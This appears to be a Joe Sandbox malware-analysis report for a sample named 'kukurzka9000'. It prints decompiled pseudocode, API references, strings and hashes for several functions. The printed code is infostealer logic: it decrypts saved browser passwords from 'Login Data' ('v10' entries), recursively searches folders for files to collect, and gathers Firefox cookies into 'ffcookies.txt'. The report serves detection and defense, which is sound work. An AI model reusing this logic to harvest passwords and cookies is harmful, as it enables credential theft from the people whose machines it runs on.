					if( *0x40e4c8() == 0) {
						if(_v24 != 0) {
							_t146 =  *0x40e4d4(_v24,  *0x40e1fc, 0xffffffff,  &_a16, 0);
							_t271 = _t270 + 0x14;
							if(_t146 == 0) {
								_push(_a16);
								if( *0x40e4cc() != 0x64) {
									L53:
									if(_t263 != 0) {
										LocalFree(_t263);
									}
									 *0x40e4bc(_a16);
									 *0x40e4c4(_v24);
									DeleteFileW(_t204);
									if(_t204 != 0) {
										LocalFree(_t204);
									}
									goto L57;
								}
								_t205 = _v44;
								do {
									_t153 =  *0x40e4c0(_a16, 0);
									_t154 =  *0x40e4c0(_a16, 1);
									_v48 = _t154;
									_t155 =  *0x40e4c0(_a16, 2);
									_t271 = _t271 + 0x18;
									_t255 = _t155;
									if(_t153 >= 1 && (_v48 >= 1 || _t255 >= 1)) {
										_t157 =  *0x40e4b8(_a16, 0);
										_v44 = _t157;
										_t158 =  *0x40e4b8(_a16, 1);
										_t271 = _t271 + 0x10;
										_v40 = _t158;
										if(_t255 <= 0) {
											goto L51;
										}
										_t265 =  *0x40e4d0(_a16, 2);
										_t54 = _t255 + 0x40; // 0x40
										_v36 = _t265;
										_t160 =  *((intOrPtr*)( *0x40e044))(0x40, _t54);
										_t161 =  *((intOrPtr*)( *0x40e050))(_t160, _t265);
										_v48 = _t161;
										_v12 =  *_t161;
										_v11 =  *((intOrPtr*)(_t161 + 1));
										_v10 =  *((intOrPtr*)(_t161 + 2));
										_v9 = 0;
										if(_t265 == 0) {
											L50:
											LocalFree(_t161);
											goto L51;
										}
										_t266 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
										_t165 =  *0x40e1a4; // 0x815d48
										_v20 = _t165;
										_push("v10");
										_push( &_v12);
										_v8 = _t266;
										if( *((intOrPtr*)( *0x40e084))() != 0) {
											_push( &_v80);
											_v84 = _v36;
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_v88 = 0x200;
											_push( &_v88);
											if( *((intOrPtr*)( *0x40e0b0))() == 0) {
												_t267 = _v8;
												L47:
												if(_t267 != 0) {
													LocalFree(_t267);
												}
												_t161 = _v48;
												goto L50;
											}
											 *((char*)(_v80 + _v76)) = 0;
											_t173 = E0040A4C2(_v76);
											_v36 = _t173;
											_t174 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _t173);
											_t271 = _t271 + 0x14;
											_t175 = lstrlenW(_v20);
											_t267 = _v8;
											if(_t174 >= _t175) {
												 *_t205 = E0040A503( *_t205, _t267);
											}
											if(_v76 != 0) {
												LocalFree(_v76);
											}
											LocalFree(_v36);
											L39:
											goto L47;
										}
										_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _t255 << 2);
										if(E0040177F(_v36,  &_v16, _t255) == 0) {
											_t267 = _v8;
										} else {
											_t184 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _v16);
											_t271 = _t271 + 0x14;
											_t185 = lstrlenW(_v20);
											_t267 = _v8;
											if(_t184 >= _t185) {
												 *_t205 = E0040A503( *_t205, _t267);
											}
										}
										if(_v16 == 0) {
											goto L47;
										} else {
											LocalFree(_v16);
											goto L39;
										}
									}
									L51:
									_push(_a16);
								} while ( *0x40e4cc() == 0x64);
								_t204 = _v32;
								_t263 = _v56;
								goto L53;
							}
							LocalFree(_t263);
							LocalFree(_t204);
							 *0x40e4c4(_v24);
							_t190 = 0xfffffffd;
							return _t190;
						}
						_t258 = 0xfffffffe;
						L22:
						LocalFree(_t263);
						LocalFree(_t204);
						return _t258;
					}
					_t258 = 0xffffffffffffffff;
					goto L22;
				}
			}

0x004027cd
0x004027cf
0x004027d2
0x004027de
0x004027e0
0x004027e7
0x004027ef
0x004027fa
0x00402808
0x00402811
0x00402814
0x0040281e
0x0040282b
0x0040282e
0x0040283b
0x0040283d
0x00402840
0x00402845
0x00402845
0x00402854
0x00402857
0x00402858
0x00402859
0x0040285a
0x0040285e
0x00402862
0x00402867
0x00402872
0x00402877
0x0040287d
0x00402889
0x00402889
0x0040287d
0x0040288f
0x00402894
0x00402894
0x0040289e
0x004028a3
0x004028a3
0x004028ad
0x004028b2
0x004028b2
0x004028ba
0x004028bd
0x004028bd
0x004028c5
0x004028c8
0x004028c8
0x004028ce
0x004028d3
0x00402c97
0x00000000
0x004028d9
0x004028e5
0x004028ed
0x004028f8
0x00402900
0x0040290b
0x00402913
0x0040291e
0x00402926
0x00402931
0x00402939
0x00402944
0x0040294c
0x00402957
0x0040295f
0x00402971
0x0040297e
0x0040298b
0x0040299b
0x004029a1
0x004029a6
0x004029a9
0x004029ae
0x004029b3
0x00402c9e
0x00402c9f
0x00402ca6
0x00000000
0x00402cb3
0x004029bf
0x004029c1
0x004029c2
0x004029c7
0x00000000
0x00000000
0x004029d0
0x004029d1
0x004029dc
0x004029e7
0x00402a12
0x00402a18
0x00402a1d
0x00402a3f
0x00402a4c
0x00402c66
0x00402c68
0x00402c6b
0x00402c6b
0x00402c74
0x00402c7d
0x00402c86
0x00402c8e
0x00402c91
0x00402c91
0x00000000
0x00402c8e
0x00402a52
0x00402a55
0x00402a5a
0x00402a67
0x00402a72
0x00402a75
0x00402a7b
0x00402a7e
0x00402a83
0x00402a9d
0x00402aa8
0x00402aab
0x00402ab1
0x00402ab4
0x00402ab9
0x00000000
0x00000000
0x00402ad0
0x00402ad4
0x00402ad7
0x00402add
0x00402ae7
0x00402ae9
0x00402aee
0x00402af4
0x00402afa
0x00402afd
0x00402b03
0x00402c46
0x00402c47
0x00000000
0x00402c47
0x00402b1d
0x00402b1f
0x00402b24
0x00402b2a
0x00402b2f
0x00402b30
0x00402b37
0x00402bb6
0x00402bb9
0x00402bc1
0x00402bc2
0x00402bc3
0x00402bc4
0x00402bc5
0x00402bc9
0x00402bd0
0x00402bd5
0x00402c35
0x00402c38
0x00402c3a
0x00402c3d
0x00402c3d
0x00402c43
0x00000000
0x00402c43
0x00402bdd
0x00402be1
0x00402bf6
0x00402c00
0x00402c02
0x00402c0a
0x00402c0e
0x00402c11
0x00402c1c
0x00402c1c
0x00402c22
0x00402c27
0x00402c27
0x00402ba5
0x00402ba5
0x00000000
0x00402ba5
0x00402b50
0x00402b5b
0x00402b95
0x00402b5d
0x00402b75
0x00402b77
0x00402b7f
0x00402b83
0x00402b86
0x00402b91
0x00402b91
0x00402b86
0x00402b9c
0x00000000
0x00402ba2
0x00402ba5
0x00000000
0x00402ba5
0x00402b9c
0x00402c4d
0x00402c4d
0x00402c57
0x00402c60
0x00402c63
0x00000000
0x00402c63
0x00402a20
0x00402a27
0x00402a30
0x00402a39
0x00000000
0x00402a39
0x004029eb
0x004029ec
0x004029ed
0x004029f4
0x00000000
0x004029fa
0x004029de
0x00000000
0x004029de

APIs

LocalFree.KERNEL32(00000000), ref: 00402845

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 00402894
LocalFree.KERNEL32(00000000), ref: 004028A3
LocalFree.KERNEL32(00000000), ref: 004028B2
LocalFree.KERNEL32(00000000), ref: 004028BD
LocalFree.KERNEL32(00000000), ref: 004028C8
LocalFree.KERNEL32(00000000), ref: 004029ED
LocalFree.KERNEL32(?), ref: 004029F4
LocalFree.KERNEL32(00000000), ref: 00402A20
LocalFree.KERNEL32(?), ref: 00402A27
LocalFree.KERNEL32(00000000), ref: 00402C9F
DeleteFileW.KERNEL32(?), ref: 00402CA6
LocalFree.KERNEL32(?), ref: 00402CAD

Strings

v10, xrefs: 00402B2A
Login Data, xrefs: 00402993

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: Login Data$v10
API String ID: 2194112602-2191985363
Opcode ID: 18e78e8ff6f735b836f31b0206ae2e491e165408470930e53818c058bcf09315
Instruction ID: 1f8185af0f1f67a55c4789a30ea30f5b3919f5d8761e9684d4856192d3457fc8
Opcode Fuzzy Hash: 18e78e8ff6f735b836f31b0206ae2e491e165408470930e53818c058bcf09315
Instruction Fuzzy Hash: 25F18071900225EFDB05DFA6DE48AAE7BB5FB08310F144935F515B72E0CBB89920CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405B5B Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 372
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00405B5B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36, intOrPtr _a40, char _a44) {
				void* _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				char _v620;
				signed int _v632;
				unsigned int _v636;
				signed int _v664;
				void* __ebx;
				void* __esi;
				void* _t112;
				signed int _t114;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t121;
				WCHAR* _t122;
				WCHAR* _t125;
				void* _t127;
				WCHAR* _t129;
				intOrPtr _t135;
				WCHAR* _t136;
				void* _t138;
				void* _t140;
				signed int _t144;
				signed int _t148;
				WCHAR* _t151;
				WCHAR* _t158;
				WCHAR* _t162;
				void* _t167;
				unsigned int _t175;
				WCHAR* _t177;
				WCHAR* _t182;
				void* _t186;
				WCHAR* _t189;
				WCHAR* _t192;
				void* _t194;
				void* _t195;
				WCHAR* _t196;
				void* _t201;
				void* _t202;
				char* _t232;
				intOrPtr _t233;
				intOrPtr _t239;
				WCHAR* _t245;
				intOrPtr _t249;
				signed int _t251;
				signed int _t252;
				WCHAR* _t253;
				void* _t254;
				void* _t255;
				void* _t259;
				void* _t260;
				unsigned int _t261;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t267;

				_t1 =  &_a44; // 0x406321
				_t249 =  *_t1;
				_v44 = __edx;
				_v40 = __ecx;
				if(_t249 <= _a40) {
					_v16 = _v16 & 0x00000000;
					_t112 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
					_t195 =  *((intOrPtr*)( *0x40e13c))(_t112, _a4);
					_v52 = _t195;
					_t114 =  *((intOrPtr*)( *0x40e08c))(_t195);
					_t201 = 0x5c;
					__eflags =  *((intOrPtr*)(_t195 + _t114 * 2 - 2)) - _t201;
					_t202 = _t195;
					if( *((intOrPtr*)(_t195 + _t114 * 2 - 2)) == _t201) {
						_push( *0x40e3d0);
						_v16 = 1;
					} else {
						_push( *0x40e1d0);
					}
					E0040188C(_t195, _t202, 0x104, _t259);
					_t117 =  *((intOrPtr*)( *0x40e018))(_t195,  &_v664);
					_v36 = _t117;
					__eflags = _t117 - 0xffffffff;
					if(_t117 != 0xffffffff) {
						_t260 = _v36;
						_t196 = _v16;
						do {
							__eflags = _v664 & 0x00000010;
							if((_v664 & 0x00000010) == 0) {
								_t119 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
								_t120 =  *((intOrPtr*)( *0x40e13c))(_t119, _a4);
								__eflags = _t196;
								if(_t196 == 0) {
									_t233 =  *0x40e258; // 0x825ba0
									_t120 = E0040A503(_t120, _t233);
								}
								_t232 =  &_v620;
								_t121 = E0040A503(_t120, _t232);
								_t261 = _v636;
								_t251 = _v632;
								__eflags = _a24;
								_v12 = _t121;
								if(_a24 == 0) {
									_t122 = 0;
									__eflags = 0;
								} else {
									_t232 = L"*.lnk";
									_t122 = E0040A70E( &_v620, _t232);
								}
								__eflags = _v12;
								_v28 = _t122;
								if(_v12 == 0) {
									L52:
									LocalFree(_v12);
									goto L53;
								} else {
									_t135 = _a28;
									_t252 = (_t261 << 0x00000020 | _t251) >> 0xa;
									asm("cdq");
									__eflags = _t261 >> 0xa - _t232;
									if(__eflags > 0) {
										goto L52;
									}
									if(__eflags < 0) {
										L23:
										_t136 = E0040A70E( &_v620, _a12);
										__eflags = _t136;
										if(_t136 == 0) {
											L25:
											_t253 = _v28;
											__eflags = _t253;
											if(_t253 == 0) {
												goto L52;
											}
											L28:
											_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
											_t140 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t138,  *0x40e1b8), _v40);
											_t239 =  *0x40e1b8; // 0x825c20
											_v20 = E0040A503(E0040A503(_t140, _t239), _v44);
											__eflags = _t253;
											if(_t253 == 0) {
												_t264 = 0;
												__eflags = 0;
											} else {
												_t264 = E00408FA5(_v12);
											}
											_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
											_v16 = _t144;
											_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
											__eflags = _t253;
											if(_t253 != 0) {
												_t186 =  *((intOrPtr*)( *0x40e08c))(_t264);
												__eflags = _t186 - 4;
												if(_t186 > 4) {
													_t189 =  *((intOrPtr*)( *0x40e0e0))(_t264, 0, 0x5c) + 2;
													__eflags = _t189;
													StrCpyW(_v32, _t189);
												}
											}
											_t148 =  *((intOrPtr*)( *0x40e08c))(_a8);
											__eflags = _t253;
											_t150 =  !=  ? _v32 : 0;
											_t151 = E0040A2AA(_v12 + _t148 * 2,  &_v16,  !=  ? _v32 : 0);
											__eflags = _t151;
											if(_t151 == 0) {
												L51:
												LocalFree(_v32);
												LocalFree(_v16);
												LocalFree(_v20);
												goto L52;
											} else {
												_t218 = _v20;
												_v20 = E0040A503(_v20, _v16);
												__eflags = _t253;
												if(_t253 == 0) {
													_t254 = _v12;
													L41:
													_v24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
													_t158 = E0040A69E(_t218,  &_v24);
													_t265 = _v24;
													__eflags = _t158;
													if(_t158 == 0) {
														L50:
														DeleteFileW(_t265);
														LocalFree(_t265);
														goto L51;
													}
													_t162 =  *((intOrPtr*)( *0x40e184))(_t254, _t265, 0);
													__eflags = _t162;
													if(_t162 == 0) {
														goto L50;
													}
													_t255 =  *((intOrPtr*)( *0x40e03c))(_t265, 0x80000000, 1, 0, 4, 0, 0);
													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, 0, 0, 0);
													_v48 = 0;
													_t167 =  *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
													_t245 = _v48;
													_v24 = 0;
													__eflags = _t245;
													if(_t245 == 0) {
														L49:
														LocalFree(_t167);
														CloseHandle(_t255);
														goto L50;
													}
													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, _t245, 0, 0);
													__eflags = 0;
													if(0 == 0) {
														L48:
														_t167 = _v24;
														goto L49;
													}
													__eflags = _v28;
													if(_v28 == 0) {
														L47:
														_t223 = _a36;
														_v56 = _v56 & 0x00000000;
														_v68 = _v24;
														_v64 = _t255;
														_v60 = _t265;
														 *_t223 =  *_a36 + 1;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														goto L51;
													}
													_t175 =  *((intOrPtr*)( *0x40e14c))(_t255, 0);
													__eflags = _t175 >> 0xa - _a28;
													if(_t175 >> 0xa >= _a28) {
														goto L48;
													}
													goto L47;
												}
												_t177 = E0040A70E(_t264, _a12);
												__eflags = _t177;
												if(_t177 == 0) {
													L39:
													LocalFree(_v32);
													LocalFree(_v12);
													LocalFree(_v20);
													LocalFree(_v16);
													LocalFree(_t264);
													L53:
													_t107 =  &_a44; // 0x406321
													_t249 =  *_t107;
													L54:
													_t260 = _v36;
													goto L55;
												}
												_t218 = _t264;
												_t182 = E0040A70E(_t264, _a16);
												__eflags = _t182;
												if(_t182 != 0) {
													goto L39;
												}
												_t254 =  *((intOrPtr*)( *0x40e13c))(_v12, _t264);
												_v12 = _t254;
												LocalFree(_t264);
												goto L41;
											}
										}
										_t192 = E0040A70E( &_v620, _a16);
										__eflags = _t192;
										if(_t192 == 0) {
											_t253 = _v28;
											goto L28;
										}
										goto L25;
									}
									__eflags = _t252 - _t135;
									if(_t252 >= _t135) {
										goto L52;
									}
									goto L23;
								}
							}
							__eflags = _v620 - 0x2e;
							if(_v620 == 0x2e) {
								goto L55;
							}
							__eflags = _a20;
							if(_a20 == 0) {
								goto L55;
							}
							_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t262 =  *((intOrPtr*)( *0x40e000))(_t127, _a4,  &_v620);
							_t129 = E0040A70E( &_v620, _a16);
							__eflags = _t129;
							if(_t129 == 0) {
								_t26 = _t249 + 1; // 0x1
								E00405B5B(_v40, _v44, _t262, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t26);
								_t267 = _t267 + 0x2c;
							}
							LocalFree(_t262);
							goto L54;
							L55:
							_t125 =  *((intOrPtr*)( *0x40e148))(_t260,  &_v664);
							__eflags = _t125;
						} while (_t125 != 0);
						_t110 =  &_v52; // 0x406321
						LocalFree( *_t110);
						FindClose(_t260);
						goto L57;
					} else {
						LocalFree(_t195);
						L57:
						__eflags = 0;
						return 0;
					}
				}
				_t194 = 2;
				return _t194;
			}

0x00405b67
0x00405b67
0x00405b6a
0x00405b6d
0x00405b73
0x00405b82
0x00405b8d
0x00405ba1
0x00405ba4
0x00405ba7
0x00405bab
0x00405bb1
0x00405bb6
0x00405bb8
0x00405bc2
0x00405bc8
0x00405bba
0x00405bba
0x00405bba
0x00405bcf
0x00405be1
0x00405be3
0x00405be6
0x00405be9
0x00405bf7
0x00405bfa
0x00405bfd
0x00405bfd
0x00405c04
0x00405c9d
0x00405ca9
0x00405cab
0x00405cad
0x00405caf
0x00405cb7
0x00405cb7
0x00405cbc
0x00405cc4
0x00405cc9
0x00405cd1
0x00405cd7
0x00405cdb
0x00405cde
0x00405cf2
0x00405cf2
0x00405ce0
0x00405ce0
0x00405ceb
0x00405ceb
0x00405cf4
0x00405cf8
0x00405cfb
0x00405fad
0x00405fb0
0x00000000
0x00405d01
0x00405d01
0x00405d04
0x00405d08
0x00405d0c
0x00405d0e
0x00000000
0x00000000
0x00405d14
0x00405d1e
0x00405d27
0x00405d2c
0x00405d2e
0x00405d42
0x00405d42
0x00405d45
0x00405d47
0x00000000
0x00000000
0x00405d52
0x00405d5e
0x00405d74
0x00405d79
0x00405d90
0x00405d93
0x00405d95
0x00405da3
0x00405da3
0x00405d97
0x00405d9f
0x00405d9f
0x00405db1
0x00405db8
0x00405dc4
0x00405dc7
0x00405dc9
0x00405dd2
0x00405dd4
0x00405dd7
0x00405de5
0x00405de5
0x00405dec
0x00405dec
0x00405dd7
0x00405dfa
0x00405e04
0x00405e09
0x00405e0e
0x00405e14
0x00405e16
0x00405f92
0x00405f95
0x00405f9e
0x00405fa7
0x00000000
0x00405e1c
0x00405e1f
0x00405e27
0x00405e2a
0x00405e2c
0x00405e8d
0x00405e90
0x00405ea1
0x00405ea4
0x00405ea9
0x00405eac
0x00405eae
0x00405f84
0x00405f85
0x00405f8c
0x00000000
0x00405f8c
0x00405ebd
0x00405ebf
0x00405ec1
0x00000000
0x00000000
0x00405ee3
0x00405ef6
0x00405f05
0x00405f08
0x00405f0a
0x00405f0d
0x00405f10
0x00405f12
0x00405f76
0x00405f77
0x00405f7e
0x00000000
0x00405f7e
0x00405f2c
0x00405f2e
0x00405f30
0x00405f73
0x00405f73
0x00000000
0x00405f73
0x00405f32
0x00405f36
0x00405f4a
0x00405f4a
0x00405f50
0x00405f54
0x00405f59
0x00405f65
0x00405f6b
0x00405f6d
0x00405f6e
0x00405f6f
0x00405f70
0x00000000
0x00405f70
0x00405f40
0x00405f45
0x00405f48
0x00000000
0x00000000
0x00000000
0x00405f48
0x00405e33
0x00405e38
0x00405e3a
0x00405e63
0x00405e66
0x00405e6f
0x00405e78
0x00405e81
0x00405fb0
0x00405fb0
0x00405fb6
0x00405fb6
0x00405fb9
0x00405fb9
0x00000000
0x00405fb9
0x00405e3f
0x00405e41
0x00405e46
0x00405e48
0x00000000
0x00000000
0x00405e55
0x00405e58
0x00405e5b
0x00000000
0x00405e5b
0x00405e16
0x00405d39
0x00405d3e
0x00405d40
0x00405d4f
0x00000000
0x00405d4f
0x00000000
0x00405d40
0x00405d16
0x00405d18
0x00000000
0x00000000
0x00000000
0x00405d18
0x00405cfb
0x00405c0a
0x00405c12
0x00000000
0x00000000
0x00405c18
0x00405c1c
0x00000000
0x00000000
0x00405c2e
0x00405c4c
0x00405c4e
0x00405c53
0x00405c55
0x00405c57
0x00405c7d
0x00405c82
0x00405c82
0x00405c86
0x00000000
0x00405fbc
0x00405fc9
0x00405fcb
0x00405fcb
0x00405fd3
0x00405fd7
0x00405fde
0x00000000
0x00405beb
0x00405bec
0x00405fe4
0x00405fe4
0x00000000
0x00405fe4
0x00405be9
0x00405b77
0x00000000

APIs

LocalFree.KERNEL32(00000000), ref: 00405BEC

Strings

., xrefs: 00405C0A
!c@, xrefs: 00405FD3, 00405FD6
*.lnk, xrefs: 00405CE0
!c@, xrefs: 00405B67, 00405FB6

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: !c@$!c@$*.lnk$.
API String ID: 2826327444-3597364672
Opcode ID: b0d5b7ba67e721dc2419ad7a18b72dabb38105fce5c2b9528fe6729ad57d29b4
Instruction ID: a0bd4d6dd4f3a97f7616e57fc29639dad099fc1712c2800218aeb084a22374ad
Opcode Fuzzy Hash: b0d5b7ba67e721dc2419ad7a18b72dabb38105fce5c2b9528fe6729ad57d29b4
Instruction Fuzzy Hash: 75D1AC71A00216ABEF04DFA5CD44EAF7775EF48300F104929FA15B72A0DB78A951CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406725 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 321stringCOMMON

Download Yara Rule

APIs

StrCpyW.SHLWAPI(00000000,00000000), ref: 0040674F

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 004067B9
lstrlenW.KERNEL32 ref: 00406895
lstrlenW.KERNEL32(00000010), ref: 004068A0

Strings

\ffcookies.txt, xrefs: 004068CE
., xrefs: 0040678F
(vI, xrefs: 004067D6, 004067DB, 004067E8, 004067F5

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: lstrlen$CombineFreeGlobalPath
String ID: (vI$.$\ffcookies.txt
API String ID: 1001358258-2671346847
Opcode ID: d0294a9fc0581ac0fa3de42f5cfe0cf58799ffb174c14b0ebb38fbd754fd8809
Instruction ID: 20c570a6cb6be533e63ae3ac294d5736f0af275dc5b24bb95add0a5715bb0c19
Opcode Fuzzy Hash: d0294a9fc0581ac0fa3de42f5cfe0cf58799ffb174c14b0ebb38fbd754fd8809
Instruction Fuzzy Hash: D9C16FB1E00219AFDB04DFA6DD44AAEBBB5EB88310F104839F915B7391DB745D11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B177 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 275
fileCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040B177(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v576;
				char _v584;
				char _v616;
				signed char _v620;
				intOrPtr _v632;
				intOrPtr _v640;
				void* _v648;
				void* _v668;
				void* _v672;
				intOrPtr _v692;
				void* _v696;
				WCHAR* _v704;
				void* _v724;
				void* _v740;
				intOrPtr _v756;
				intOrPtr _v768;
				char _v772;
				intOrPtr _v780;
				intOrPtr _v788;
				intOrPtr _v796;
				signed int _v808;
				void* _v812;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v832;
				void* _v836;
				void* _v844;
				void* __ebx;
				void* __esi;
				void* _t66;
				void* _t70;
				void* _t78;
				void* _t86;
				void* _t89;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t102;
				intOrPtr _t103;
				void* _t116;
				void* _t117;
				void* _t127;
				intOrPtr _t128;
				void* _t130;
				WCHAR* _t132;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t177;
				void* _t182;
				intOrPtr _t183;
				void* _t185;
				void* _t189;
				signed int _t190;
				void* _t192;
				void* _t194;
				signed int _t196;
				void* _t198;

				_t198 = (_t196 & 0xfffffff8) - 0x28c;
				_t183 = __edx;
				_t190 = __ecx;
				_v640 = __edx;
				_v648 = __ecx;
				_t66 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t182, _t189, _t127);
				_t128 =  *((intOrPtr*)( *0x40e13c))(_t66, _a4);
				_v632 = _t128;
				E0040188C(_t128, _t128, 0x104, __ecx,  *0x40e1d0);
				_t70 =  *((intOrPtr*)( *0x40e018))(_t128,  &_v616);
				_v672 = _t70;
				if(_t70 == 0xffffffff) {
					L21:
					return 0;
				}
				_t130 = _t70;
				do {
					if((_v620 & 0x00000010) == 0) {
						if(E0040A70E( &_v576, _a8) == 0 || E0040A70E( &_v576, _a12) != 0) {
							goto L19;
						} else {
							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t185 =  *((intOrPtr*)( *0x40e000))(_t86, _a4,  &_v584);
							_v668 = _t185;
							_v704 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t89 = E0040A69E( *0x40e044,  &_v704);
							_t132 = _v704;
							if(_t89 == 0) {
								L17:
								LocalFree(_t132);
								LocalFree(_t185);
								DeleteFileW(_t132);
								L18:
								_t130 = _v696;
								_t183 = _v692;
								goto L19;
							}
							_push(0);
							_push(_t132);
							_push(_t185);
							if( *((intOrPtr*)( *0x40e184))() == 0) {
								goto L17;
							}
							_t96 =  *((intOrPtr*)( *0x40e03c))(_t132, 0x80000000, 1, 0, 4, 0, 0);
							_v724 = _t96;
							GetFileSize(_t96, 0);
							_t98 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_t99 =  *((intOrPtr*)( *0x40e13c))(_t98,  *0x40e1b8);
							_t172 =  *0x40e1b4; // 0x7fe498
							_t100 = E0040A503(_t99, _t172);
							_t173 =  *0x40e1b8; // 0x825c20
							_t102 = E0040A503(E0040A503(_t100, _t173), _t190);
							_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_v768 = _t103;
							E0040A2AA(_t185 +  *((intOrPtr*)( *0x40e08c))(0) * 2,  &_v772, _v756);
							_t194 = E0040A503(_t102, _v772);
							_v740 = _t194;
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, 0, 0, 0);
							_v780 = 0;
							 *((intOrPtr*)( *0x40e044))(0x40, 0x144);
							_t177 = _v788;
							_v796 = 0;
							if(_t177 == 0) {
								L16:
								LocalFree(_t132);
								LocalFree(_t194);
								LocalFree(_v812);
								LocalFree(_t185);
								L14:
								_t190 = _v808;
								goto L18;
							}
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, _t177, 0, 0);
							if(0 != 0) {
								_t116 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
								_v812 = _v836;
								_v808 = _v832;
								_t117 =  *((intOrPtr*)( *0x40e13c))(_t116, _t132);
								_t160 = _a20;
								_v808 = _v808 & 0x00000000;
								_v812 = _t117;
								 *_t160 =  *_a20 + 1;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t185 = _v832;
								_t194 = _v828;
								goto L16;
							}
							LocalFree(_t194);
							LocalFree(_v828);
							LocalFree(_v844);
							LocalFree(_t132);
							LocalFree(_t185);
							CloseHandle(_v824);
							DeleteFileW(_t132);
							goto L14;
						}
					}
					if(_v576 != 0x2e && E0040A70E( &_v576, _a8) != 0 && E0040A70E( &_v576, _a12) == 0) {
						_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						_t192 =  *((intOrPtr*)( *0x40e000))(_t78, _a4,  &_v584);
						E0040B177(_v692, _t183, _t192, _a8, _a12, _a16, _a20);
						_t198 = _t198 + 0x14;
						LocalFree(_t192);
						_t190 = _v692;
					}
					L19:
					_push( &_v620);
					_push(_t130);
				} while ( *((intOrPtr*)( *0x40e148))() != 0);
				LocalFree(_v648);
				FindClose(_t130);
				goto L21;
			}

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 0040B30E
LocalFree.KERNEL32(00000000), ref: 0040B3ED
LocalFree.KERNEL32(?), ref: 0040B3F8
LocalFree.KERNEL32(?), ref: 0040B402
LocalFree.KERNEL32(?), ref: 0040B409
LocalFree.KERNEL32(00000000), ref: 0040B410
CloseHandle.KERNEL32(?), ref: 0040B41B
DeleteFileW.KERNEL32(?), ref: 0040B422
LocalFree.KERNEL32(?), ref: 0040B483
